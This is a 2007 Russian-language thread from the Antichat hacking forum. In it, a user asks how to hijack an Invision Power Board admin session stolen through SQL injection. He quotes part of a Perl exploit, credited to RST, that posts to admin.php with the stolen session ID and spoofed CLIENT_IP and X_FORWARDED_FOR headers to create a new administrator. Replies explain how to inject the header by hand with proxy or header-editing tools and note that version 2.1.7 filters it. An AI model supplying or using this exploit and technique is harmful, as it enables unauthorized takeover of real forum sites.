Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Вручную подделать Client_ip на Ipb |
23.01.2007, 04:06
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 82
Провел на форуме:
248469
Репутация:
33
|
|
Вручную подделать Client_ip на Ipb
Есть возможность через sql утащить сессию и session_ip админа. Есть ли возможность вручную войти в админку, используя эту уязвимость:
Код:
sub create_admin()
{
$InfoWindow=$mw->DialogBox(-title => 'create new admin', -buttons => ["OK"]);
if($session_id eq '' || $session_ip_address eq '')
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => 'You need insert admin session_id and session_ip_address', -font => '{Verdana} 8')->pack;
}
elsif($session_ip_address !~ /\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/)
{
$InfoWindow->add('Label', -text => 'Error!', -font => '{Verdana} 8 bold',-foreground=>'red')->pack;
$InfoWindow->add('Label', -text => 'session_ip_address wrong!', -font => '{Verdana} 8')->pack;
}
else
{
$xpl = LWP::UserAgent->new( ) or die;
($url2 = $url) =~ s/index.php/admin.php/;
$cf = '';
%fields = (
'code' => 'doadd',
'act' => 'mem',
'section' => 'content',
'name' => $new_admin_name,
'password' => $new_admin_password,
'email' => $new_admin_email,
'mgroup' => $group,
);
if($use_custom_fields)
{
@cf = split(',',$custom_fields);
foreach(@cf) { ($k,$v) = split('=',$_); $fields{$k} = $v;}
}
$res = $xpl->post($url2."?adsess=$session_id",
[
%fields,
],
'USER_AGENT'=>'',
'CLIENT_IP'=>"$session_ip_address",
'X_FORWARDED_FOR'=>"$session_ip_address");
}
//Это кусок сплойта от RST
Собственно в CLIENT_IP нужно как-то вставить session_ip_address. Как это сделать вручную? Вроде как этот CLIENT_IP не является одним из полей get или post. |
|
|
25.01.2007, 21:17
|
|
Новичок
Регистрация: 12.11.2006
Сообщений: 9
Провел на форуме:
95494
Репутация:
2
|
|
через POST вроде так:
/index.php?CLIENT_IP[session_ip_address]=[sql]
Последний раз редактировалось CtHuLhU; 25.01.2007 в 21:19..
|
|
|
|
25.01.2007, 23:14
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
через POST вроде так:
/index.php?CLIENT_IP[session_ip_address]=[sql]
отжог. 5 баллов.
|
|
|
|
25.01.2007, 23:35
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Сообщение от CtHuLhU
через POST вроде так:
/index.php?CLIENT_IP[session_ip_address]=[sql]
Знакомое до боли))
__________________
|
|
|
|
25.01.2007, 23:44
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
+toxa+, где-то я это уже видел/слышал  )
|
|
|
|
26.01.2007, 01:40
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 82
Провел на форуме:
248469
Репутация:
33
|
|
Сообщение от CtHuLhU
через POST вроде так:
/index.php?CLIENT_IP[session_ip_address]=[sql]
Это же вроде бы GET запрос, или я чего-то не понимаю?)
|
|
|
|
26.01.2007, 10:05
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
Просто в полный запрос добавить строчку CLIENT_IP .. да хоть с помощью, как сказал ettee, проксимитрона
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
26.01.2007, 12:26
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 82
Провел на форуме:
248469
Репутация:
33
|
|
С заголовками разобрался, спасибо Проще всего наверное это делать в LiveHttpHeaders.
В 2.1.7 подмена ip в админке тоже прокатит?
Последний раз редактировалось vmn; 26.01.2007 в 12:31..
|
|
|
|
26.01.2007, 12:53
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
нет, в 217 фильтрация
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
